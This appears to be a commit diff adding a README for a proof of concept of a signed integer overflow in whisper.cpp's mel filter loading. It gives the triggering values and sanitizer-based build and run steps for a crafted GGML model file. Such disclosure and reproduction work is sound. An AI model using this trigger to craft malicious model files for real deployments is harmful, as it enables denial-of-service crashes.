Add PoC and reproduction instructions
Browse files
README.md
ADDED
|
@@ -0,0 +1,25 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# PoC: Signed Integer Overflow in whisper.cpp Mel Filter Loading
|
| 2 |
+
|
| 3 |
+
**Format:** GGML (.bin)
|
| 4 |
+
**Target:** whisper.cpp (ggml-org/whisper.cpp)
|
| 5 |
+
**CWE:** CWE-190 (Integer Overflow)
|
| 6 |
+
|
| 7 |
+
## Vulnerability
|
| 8 |
+
|
| 9 |
+
Signed integer overflow in mel filter size calculation. `n_mel=0x7FFFFFFF * n_fft=2` overflows int32 → massive `vector::resize()` → crash.
|
| 10 |
+
|
| 11 |
+
## Reproduction
|
| 12 |
+
|
| 13 |
+
```bash
|
| 14 |
+
git clone https://github.com/ggml-org/whisper.cpp && cd whisper.cpp
|
| 15 |
+
mkdir build-asan && cd build-asan
|
| 16 |
+
cmake .. -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
|
| 17 |
+
-DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
|
| 18 |
+
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address,undefined"
|
| 19 |
+
make -j$(nproc)
|
| 20 |
+
./bin/whisper-cli -m ../poc_mel_overflow.bin -f /dev/null
|
| 21 |
+
```
|
| 22 |
+
|
| 23 |
+
UBSan reports: `runtime error: signed integer overflow: 2147483647 * 2`
|
| 24 |
+
|
| 25 |
+
**Tested:** whisper.cpp commit 364c77f4
|